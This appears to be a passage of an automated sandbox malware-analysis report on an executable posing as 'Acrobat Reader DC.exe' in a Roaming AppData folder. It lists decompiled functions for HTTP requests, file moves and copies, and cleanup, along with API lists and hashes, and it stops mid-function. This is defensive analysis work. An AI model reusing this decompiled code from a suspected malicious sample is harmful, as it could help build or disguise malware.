                                    • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                    • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                    • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Variant$Copy$ClearErrorInitLast_memset
                                  • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                  • API String ID: 530611519-625585964
                                  • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                  • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                                  • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                  • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401CB0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 240COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 80%
                                  			E00401CB0(intOrPtr __ecx) {
				intOrPtr _v8;
				long _v12;
				long* _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t97;
				struct HWND__* _t100;
				int** _t103;
				intOrPtr* _t104;
				struct HINSTANCE__** _t105;
				intOrPtr* _t106;
				void* _t119;
				void* _t124;
				void* _t126;
				void* _t129;
				void* _t131;
				intOrPtr* _t159;
				signed int _t173;
				long* _t174;
				intOrPtr _t203;
				intOrPtr _t205;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				long* _t210;
				intOrPtr* _t212;
				intOrPtr* _t217;
				intOrPtr* _t219;
				intOrPtr* _t220;
				intOrPtr* _t221;
				intOrPtr* _t222;
				intOrPtr _t225;
				void* _t226;

				_t205 = __ecx;
				_t97 = __ecx - 0x49c;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx - 0x49c)) + 4)) + __ecx - 0x49c)) = "bZB";
				_v12 = _t97;
				 *((intOrPtr*)( *((intOrPtr*)( *_t97 + 4)) + __ecx - 0x4a0)) =  *((intOrPtr*)( *_t97 + 4)) - 0x49c;
				_t100 =  *(__ecx - 0x3b4);
				_v8 = __ecx;
				if(_t100 != 0) {
					DestroyWindow(_t100);
				}
				mciSendStringW(L"close all", 0, 0, 0);
				if( *((intOrPtr*)(_t205 - 0x2ec)) > 0) {
					_t207 = 0;
					do {
						_t103 =  *( *((intOrPtr*)(_t205 - 0x2f0)) + _t207 * 4);
						if( *_t103 != 0) {
							UnregisterHotKey( *0x497518,  *( *_t103));
							_t171 =  *( *( *((intOrPtr*)(_t205 - 0x2f0)) + _t207 * 4));
							if( *( *( *((intOrPtr*)(_t205 - 0x2f0)) + _t207 * 4)) != 0) {
								E00442B97(_t171);
							}
						}
						_t207 = _t207 + 1;
					} while (_t207 <  *((intOrPtr*)(_t205 - 0x2ec)));
					goto L2;
				} else {
					L2:
					if( *((intOrPtr*)(_t205 - 0x31c)) > 0) {
						_t173 = 0;
						do {
							_t104 =  *((intOrPtr*)( *((intOrPtr*)(_t205 - 0x320)) + _t173 * 4));
							if( *_t104 != 0) {
								_t159 =  *_t104;
								if( *_t159 != 0) {
									FindClose( *(_t159 + 8));
									_push( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t205 - 0x320)) + _t173 * 4)))) + 0xc)));
									E004111DC();
									_t226 = _t226 + 4;
								} else {
									_t225 =  *((intOrPtr*)(_t159 + 4));
									E0040DA20(_t225);
									 *((intOrPtr*)(_t225 + 0x2c)) = 0;
									 *((intOrPtr*)(_t225 + 0x30)) = 0;
								}
								_t203 =  *((intOrPtr*)(_t205 - 0x320));
								_t183 =  *((intOrPtr*)( *((intOrPtr*)(_t203 + _t173 * 4))));
								_push( *((intOrPtr*)( *((intOrPtr*)(_t203 + _t173 * 4)))));
								E004111DC();
								_t226 = _t226 + 4;
							}
							_t173 = _t173 + 1;
						} while (_t173 <  *((intOrPtr*)(_t205 - 0x31c)));
					}
					if( *((intOrPtr*)(_t205 - 0x30c)) > 0) {
						_t208 = 0;
						do {
							_t105 =  *( *((intOrPtr*)(_t205 - 0x310)) + _t208 * 4);
							if( *_t105 != 0) {
								FreeLibrary( *_t105);
							}
							_t208 = _t208 + 1;
						} while (_t208 <  *((intOrPtr*)(_t205 - 0x30c)));
					}
					if( *((intOrPtr*)(_t205 - 0x2fc)) > 0) {
						_t209 = 0;
						do {
							_t183 =  *((intOrPtr*)(_t205 - 0x300));
							_t106 =  *((intOrPtr*)( *((intOrPtr*)(_t205 - 0x300)) + _t209 * 4));
							if( *_t106 != 0) {
								VirtualFree( *( *_t106 + 0x10), 0, 0x8000);
								_t183 =  *((intOrPtr*)(_t205 - 0x300));
								_t155 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t205 - 0x300)) + _t209 * 4))));
								if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t205 - 0x300)) + _t209 * 4)))) != 0) {
									E0044AFD1(_t155);
								}
							}
							_t209 = _t209 + 1;
						} while (_t209 <  *((intOrPtr*)(_t205 - 0x2fc)));
					}
					_t210 = _t205 - 0x2e4;
					_v16 = _t210;
					E00408F40(_t205, _t210);
					_t210[2] = 1;
					 *_t210 = 0;
					_t174 = _t205 - 0x14;
					E00408F40(_t205, _t174);
					_t212 = _v12;
					_t174[2] = 1;
					 *_t174 = 0;
					_t111 =  *((intOrPtr*)( *_t212 + 4)) + _t205;
					if( *((intOrPtr*)( *((intOrPtr*)( *_t212 + 4)) + _t205 - 0x498)) == 0) {
						L8:
						E0040E750(_t183, _t205, _t212);
						_t113 =  *((intOrPtr*)(_t205 - 0x28));
						if( *((intOrPtr*)(_t205 - 0x28)) != 0) {
							E004326ED(_t113);
						}
						E00408F40(_t205, _t174);
						E004109A0(_t205 - 0x34);
						E004109C0(_t205 - 0x44);
						E00402250(_t205 - 0x64);
						_t119 = E00401400(_t205 - 0x1a0);
						_t217 = _t205 - 0x1bc;
						 *_t217 = 0x48ab10;
						E004109E0(_t119, _t217);
						_push( *((intOrPtr*)(_t217 + 4)));
						E004111DC();
						E004012F0(_t205 - 0x2c4, _t205);
						E00402250(_t205 - 0x2d4);
						_t124 = E00408F40(_t205, _v16);
						_t219 = _t205 - 0x2f4;
						 *_t219 = 0x48ab10;
						E004109E0(_t124, _t219);
						_push( *((intOrPtr*)(_t219 + 4)));
						_t126 = E004111DC();
						_t220 = _t205 - 0x304;
						 *_t220 = 0x48ab10;
						E004109E0(_t126, _t220);
						_push( *((intOrPtr*)(_t220 + 4)));
						_t129 = E004111DC();
						_t221 = _t205 - 0x314;
						 *_t221 = 0x48ab10;
						E004109E0(_t129, _t221);
						_push( *((intOrPtr*)(_t221 + 4)));
						_t131 = E004111DC();
						_t222 = _t205 - 0x324;
						 *_t222 = 0x48ab10;
						E004109E0(_t131, _t222);
						_push( *((intOrPtr*)(_t222 + 4)));
						E004111DC();
						E00410AA0(_t205 - 0x330);
						E00410A70(_t205 - 0x340, _t205 - 0x2c4);
						E00402250(_t205 - 0x350);
						E00410A40(_t205 - 0x368);
						E004109C0(_t205 - 0x374);
						E004109C0(_t205 - 0x380);
						E00402250(_t205 - 0x3c4);
						E00402250(_t205 - 0x3d4);
						E00402250(_t205 - 0x3e4);
						return E0040DDD0(_t205 - 0x414);
					} else {
						_v12 = 0;
						do {
							E0040D410( &_v12, _t111 - 0x49c);
							E0040DA90(_t174, _t111 - 0x49c,  *((intOrPtr*)( *_t212 + 4)) + _t205 - 0x498);
							_t183 =  *_t212;
							_t111 = _v8 +  *((intOrPtr*)( *_t212 + 4));
							_t205 = _v8;
						} while ( *((intOrPtr*)(_v8 +  *((intOrPtr*)( *_t212 + 4)) - 0x498)) != 0);
						goto L8;
					}
				}
			}





































                                  0x00401cb9
                                  0x00401cc4
                                  0x00401cca
                                  0x00401cd5
                                  0x00401ce3
                                  0x00401cea
                                  0x00401cf0
                                  0x00401cf5
                                  0x00426f50
                                  0x00426f50
                                  0x00401d06
                                  0x00401d13
                                  0x00426f5b
                                  0x00426f5d
                                  0x00426f63
                                  0x00426f69
                                  0x00426f77
                                  0x00426f86
                                  0x00426f8a
                                  0x00426f8d
                                  0x00426f8d
                                  0x00426f8a
                                  0x00426f92
                                  0x00426f93
                                  0x00000000
                                  0x00401d19
                                  0x00401d19
                                  0x00401d20
                                  0x00426fa0
                                  0x00426fa2
                                  0x00426fa8
                                  0x00426fae
                                  0x00426fb0
                                  0x00426fb5
                                  0x00426fcd
                                  0x00426fe1
                                  0x00426fe2
                                  0x00426fe7
                                  0x00426fb7
                                  0x00426fb7
                                  0x00426fba
                                  0x00426fc1
                                  0x00426fc4
                                  0x00426fc4
                                  0x00426fea
                                  0x00426ff3
                                  0x00426ff5
                                  0x00426ff6
                                  0x00426ffb
                                  0x00426ffb
                                  0x00426ffe
                                  0x00426fff
                                  0x00427007
                                  0x00401d2d
                                  0x0042700c
                                  0x0042700e
                                  0x00427014
                                  0x0042701a
                                  0x0042701f
                                  0x0042701f
                                  0x00427025
                                  0x00427026
                                  0x0042702e
                                  0x00401d3a
                                  0x00427033
                                  0x00427035
                                  0x00427035
                                  0x0042703b
                                  0x00427041
                                  0x00427050
                                  0x00427056
                                  0x0042705f
                                  0x00427063
                                  0x00427066
                                  0x00427066
                                  0x00427063
                                  0x0042706b
                                  0x0042706c
                                  0x00427074
                                  0x00401d40
                                  0x00401d46
                                  0x00401d49
                                  0x00401d4e
                                  0x00401d55
                                  0x00401d5b
                                  0x00401d60
                                  0x00401d65
                                  0x00401d68
                                  0x00401d6f
                                  0x00401d7a
                                  0x00401d83
                                  0x00401dbf
                                  0x00401dbf
                                  0x00401dc4
                                  0x00401dc9
                                  0x0042707a
                                  0x0042707a
                                  0x00401dd1
                                  0x00401dd9
                                  0x00401de1
                                  0x00401de9
                                  0x00401df4
                                  0x00401df9
                                  0x00401dff
                                  0x00401e05
                                  0x00401e0d
                                  0x00401e0e
                                  0x00401e1c
                                  0x00401e27
                                  0x00401e2f
                                  0x00401e34
                                  0x00401e3a
                                  0x00401e40
                                  0x00401e48
                                  0x00401e49
                                  0x00401e4e
                                  0x00401e57
                                  0x00401e5d
                                  0x00401e65
                                  0x00401e66
                                  0x00401e6b
                                  0x00401e74
                                  0x00401e7a
                                  0x00401e82
                                  0x00401e83
                                  0x00401e88
                                  0x00401e91
                                  0x00401e97
                                  0x00401e9f
                                  0x00401ea0
                                  0x00401eae
                                  0x00401eb9
                                  0x00401ec4
                                  0x00401ecf
                                  0x00401eda
                                  0x00401ee5
                                  0x00401ef0
                                  0x00401efb
                                  0x00401f06
                                  0x00401f1c
                                  0x00401d85
                                  0x00401d85
                                  0x00401d8c
                                  0x00401d95
                                  0x00401da6
                                  0x00401dab
                                  0x00401db0
                                  0x00401db3
                                  0x00401db6
                                  0x00000000
                                  0x00401d8c
                                  0x00401d83

                                  APIs
                                  • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                                  • DestroyWindow.USER32(?), ref: 00426F50
                                  • UnregisterHotKey.USER32(?), ref: 00426F77
                                  • FreeLibrary.KERNEL32(?), ref: 0042701F
                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                  • String ID: close all
                                  • API String ID: 4174999648-3243417748
                                  • Opcode ID: 4052fa3676dac3e377c2eda6cd32e3dbff7831d3d551d493591d62a78ae4b3a8
                                  • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                                  • Opcode Fuzzy Hash: 4052fa3676dac3e377c2eda6cd32e3dbff7831d3d551d493591d62a78ae4b3a8
                                  • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044AA86 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 174networkCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 78%
                                  			E0044AA86(void** _a4, long _a8, long _a12, char _a16) {
				intOrPtr _v8;
				void* _v12;
				void _v44;
				void* _t43;
				void* _t47;
				void* _t54;
				void* _t57;
				void* _t65;
				void* _t70;
				void* _t87;
				void** _t89;
				long _t90;

				_t90 = _a8;
				_t89 = _a4;
				_a8 = _t89[0x15];
				if( *((intOrPtr*)(_t90 + 0x74)) == 4) {
					_a8 = _a8 | 0x00800000;
				}
				_t43 = InternetConnectW(_t89[1],  *(_t90 + 0x10),  *(_t90 + 0x78) & 0x0000ffff,  *(_t90 + 0x20),  *(_t90 + 0x30),  *(_t90 + 0x70), 0, 0);
				 *_t89 = _t43;
				_push(0);
				if(_t43 != 0) {
					_t70 = HttpOpenRequestW(_t43, 0,  *(_t90 + 0x60), 0, 0, 0, _a8, ??);
					_v12 = _t70;
					_v8 = InternetCloseHandle;
					if(_t70 != 0) {
						if(_a12 != 0) {
							E00442516(_t89, _t70, _t90);
						}
						if((_a8 & 0x00001000) != 0) {
							_a8 = 4;
							InternetQueryOptionW(_t70, 0x1f,  &_a12,  &_a8);
							_a12 = _a12 | 0x00000100;
							InternetSetOptionW(_t70, 0x1f,  &_a12, 4);
						}
						if(HttpSendRequestW(_t70, 0, 0, 0, 0) == 0 || E004318EB(_t70) != 0xc8) {
							_t47 = E004422CB(_t89, 0xd, 0xdeadbeef, 0);
							E00431861( &_v12);
							return _t47;
						} else {
							_a12 = 0;
							_a8 = 0x20;
							HttpQueryInfoW(_t70, 5,  &_v44,  &_a8,  &_a12);
							_t87 =  &_v44;
							_t89[4] = E0041319B(_t87);
							_t89[5] = _t87;
							if(_a16 == 0) {
								_t54 = E004422CB(_t89, 0, 0, 1);
								E00431861( &_v12);
								return _t54;
							} else {
								_t57 = E004424F3(_t89, _t70);
								E00431861( &_v12);
								return _t57;
							}
						}
					} else {
						_t65 = E004422CB(_t89, 0xc, 0xdeadbeef, _t70);
						E00431861( &_v12);
						return _t65;
					}
				} else {
					_push(0xdeadbeef);
					_push(0xb);
					_push(_t89);
					return E004422CB();
				}
			}















                                  0x0044aa8e
                                  0x0044aa96
                                  0x0044aa9c
                                  0x0044aa9f
                                  0x0044aaa1
                                  0x0044aaa1
                                  0x0044aac5
                                  0x0044aacb
                                  0x0044aacd
                                  0x0044aad1
                                  0x0044ab00
                                  0x0044ab07
                                  0x0044ab0a
                                  0x0044ab0f
                                  0x0044ab39
                                  0x0044ab3e
                                  0x0044ab3e
                                  0x0044ab4a
                                  0x0044ab57
                                  0x0044ab5e
                                  0x0044ab64
                                  0x0044ab74
                                  0x0044ab74
                                  0x0044ab8b
                                  0x0044ac22
                                  0x0044ac2d
                                  0x0044ac3a
                                  0x0044ab9e
                                  0x0044abad
                                  0x0044abb4
                                  0x0044abbb
                                  0x0044abc1
                                  0x0044abd1
                                  0x0044abd4
                                  0x0044abd7
                                  0x0044abfd
                                  0x0044ac08
                                  0x0044ac15
                                  0x0044abd9
                                  0x0044abdb
                                  0x0044abe6
                                  0x0044abf3
                                  0x0044abf3
                                  0x0044abd7
                                  0x0044ab11
                                  0x0044ab1a
                                  0x0044ab25
                                  0x0044ab32
                                  0x0044ab32
                                  0x0044aad3
                                  0x0044aad3
                                  0x0044aad8
                                  0x0044aada
                                  0x0044aae6
                                  0x0044aae6

                                  APIs
                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                                  • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                                  • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                                  • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                                  • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                                    • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                  • String ID:
                                  • API String ID: 1291720006-3916222277
                                  • Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                  • Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
                                  • Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                  • Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004352C2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 114COMMON
                                  Download Yara Rule
                                  APIs
                                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                                  • VariantClear.OLEAUT32(?), ref: 00435320
                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                                  • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                                  • VariantClear.OLEAUT32(?), ref: 004353B3
                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                                  • String ID: crts
                                  • API String ID: 586820018-3724388283
                                  • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                  • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
                                  • Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                  • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044BBD2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 105filestringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0044BBD2(void* __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, signed int _a12) {
				long _v10;
				long _v14;
				long _v18;
				struct _SHFILEOPSTRUCTW _v36;
				short _v560;
				short _v1084;
				void* __ebx;
				signed int _t45;
				signed int _t47;
				signed int _t48;
				signed int _t50;
				signed int _t56;
				signed int _t63;
				void* _t86;
				void* _t87;
				void* _t88;
				void* _t89;
				void* _t90;
				void* _t91;

				_t88 = _t87 - 0x438;
				_t63 = _a12;
				E00410120( &_v1084, _a4, __edx);
				E00410120( &_v560, _a8, __edx);
				if(lstrcmpiW( &_v1084,  &_v560) != 0) {
					_t45 = E00433998( &_v1084);
					_t89 = _t88 + 4;
					__eflags = _t45;
					if(_t45 == 0) {
						goto L8;
					} else {
						_t47 = E00433998( &_v560);
						_t90 = _t89 + 4;
						__eflags = _t47;
						if(__eflags == 0) {
							_t48 = E004335CD(_t63, __edi, __esi, __eflags,  &_v560);
							_t91 = _t90 + 4;
							__eflags = _t48;
							if(_t48 == 0) {
								goto L8;
							} else {
								_t50 = E00433998( &_v560);
								_t90 = _t91 + 4;
								__eflags = _t50;
								if(_t50 == 0) {
									goto L8;
								} else {
									goto L11;
								}
							}
						} else {
							__eflags = _t63;
							if(_t63 != 0) {
								L11:
								E00411536( &_v1084, L"\\*.*");
								 *((short*)(_t86 + E004111C1( &_v1084) * 2 - 0x436)) = 0;
								 *((short*)(_t86 + E004111C1( &_v560) * 2 - 0x22a)) = 0;
								_v36.pFrom =  &_v1084;
								_v36.pTo =  &_v560;
								_v14 = 0;
								_v10 = 0;
								_v18 = 0;
								_v36.hwnd = 0;
								_v36.wFunc = 2;
								_v36.fFlags = 0x614;
								_t56 = SHFileOperationW( &_v36);
								__eflags = _t56;
								_t37 = _t56 == 0;
								__eflags = _t37;
								return _t56 & 0xffffff00 | _t37;
							} else {
								goto L8;
							}
						}
					}
				} else {
					if(_t63 == 0) {
						L8:
						__eflags = 0;
						return 0;
					} else {
						if(E0041313C( &_v1084,  &_v560) != 0) {
							MoveFileW( &_v1084,  &_v560);
						}
						return 1;
					}
				}
			}






















                                  0x0044bbd8
                                  0x0044bbdf
                                  0x0044bbe8
                                  0x0044bbf6
                                  0x0044bc11
                                  0x0044bc53
                                  0x0044bc58
                                  0x0044bc5b
                                  0x0044bc5d
                                  0x00000000
                                  0x0044bc5f
                                  0x0044bc66
                                  0x0044bc6b
                                  0x0044bc6e
                                  0x0044bc70
                                  0x0044bc84
                                  0x0044bc89
                                  0x0044bc8c
                                  0x0044bc8e
                                  0x00000000
                                  0x0044bc90
                                  0x0044bc97
                                  0x0044bc9c
                                  0x0044bc9f
                                  0x0044bca1
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0044bca1
                                  0x0044bc72
                                  0x0044bc72
                                  0x0044bc74
                                  0x0044bca3
                                  0x0044bcaf
                                  0x0044bcc9
                                  0x0044bcd8
                                  0x0044bcec
                                  0x0044bcf2
                                  0x0044bd00
                                  0x0044bd03
                                  0x0044bd06
                                  0x0044bd09
                                  0x0044bd0c
                                  0x0044bd13
                                  0x0044bd17
                                  0x0044bd1d
                                  0x0044bd1f
                                  0x0044bd1f
                                  0x0044bd26
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0044bc74
                                  0x0044bc70
                                  0x0044bc13
                                  0x0044bc15
                                  0x0044bc76
                                  0x0044bc76
                                  0x0044bc7c
                                  0x0044bc17
                                  0x0044bc2f
                                  0x0044bc3f
                                  0x0044bc3f
                                  0x0044bc4b
                                  0x0044bc4b
                                  0x0044bc15

                                  APIs
                                    • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe,0040F545,C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe,004A90E8,C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe,?,0040F545), ref: 0041013C
                                  • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                                  • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                                  • _wcscat.LIBCMT ref: 0044BCAF
                                  • _wcslen.LIBCMT ref: 0044BCBB
                                  • _wcslen.LIBCMT ref: 0044BCD1
                                  • SHFileOperationW.SHELL32(?), ref: 0044BD17
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                  • String ID: \*.*
                                  • API String ID: 2326526234-1173974218
                                  • Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                  • Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
                                  • Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                  • Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004335CD Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 75%
                                  			E004335CD(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				short _v528;
				signed int _t19;
				signed char _t20;
				long _t23;
				signed int _t25;
				signed int _t26;
				signed int _t29;
				short* _t34;
				void* _t35;
				signed int _t36;
				void* _t44;
				void* _t48;
				void* _t49;
				void* _t52;

				_t48 = __esi;
				_t44 = __edi;
				_t35 = __ebx;
				E00433244( &_v528, _a4, 0x104);
				_t19 = E004111C1( &_v528);
				if(_t19 != 0) {
					_t34 = _t52 + _t19 * 2 - 0x20e;
					if( *((short*)(_t52 + _t19 * 2 - 0x20e)) == 0x5c) {
						 *_t34 = 0;
					}
				}
				_t20 = GetFileAttributesW( &_v528);
				if(_t20 != 0xffffffff) {
					__eflags = _t20 & 0x00000010;
					if((_t20 & 0x00000010) != 0) {
						goto L6;
					} else {
						goto L14;
					}
				} else {
					_t23 = GetLastError();
					if(_t23 != 2) {
						__eflags = _t23 - 3;
						if(__eflags != 0) {
							L14:
							__eflags = 0;
							return 0;
						} else {
							goto L8;
						}
					} else {
						if(CreateDirectoryW( &_v528, 0) == 0) {
							L8:
							_push(_t48);
